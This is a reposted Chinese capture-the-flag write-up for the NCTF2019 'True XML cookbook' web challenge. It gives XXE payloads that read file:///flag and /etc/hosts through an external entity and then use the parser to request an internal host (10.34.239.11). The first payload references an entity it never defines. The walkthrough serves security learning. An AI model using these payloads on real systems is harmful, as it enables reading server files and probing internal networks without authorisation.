碼上快樂

相關內容    簡體    繁體

[NCTF2019]True XML cookbook

本文轉載自   查看原文   2020-11-15 17:37   364    CTF

[NCTF2019]True XML cookbook

爆破

抓包爆破,想直接爆出密碼。
然鵝我天真了。

XXE漏洞

這里存在XXE漏洞,利用腳本直接打:
構造:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
  <username>&admin;</username>
  <password>password</password>
</user>

在這里插入圖片描述

沒有哦·····

打內網

XXE漏洞可以直接攻擊內網用戶,先查看內網存活主機:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/hosts">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在這里插入圖片描述
看到了本機ip,但是不知道存活ip。
可以用BP爆破(但是看到wp上是說ip最后一位為11):

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "http://10.34.239.11">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在這里插入圖片描述


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [NCTF2019]True XML cookbook [NCTF2019]Fake XML cookbook XXE漏洞學習和利用—[NCTF2019]Fake XML cookbook NCTF2019 Keyboard [NCTF2019]SQLi [NCTF2019]SQLi [NCTF2019]babyRSA [NCTF2019]SQLi 【Yii2-CookBook】JSON 和 XML 輸出 web.xml is missing and is set to true
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM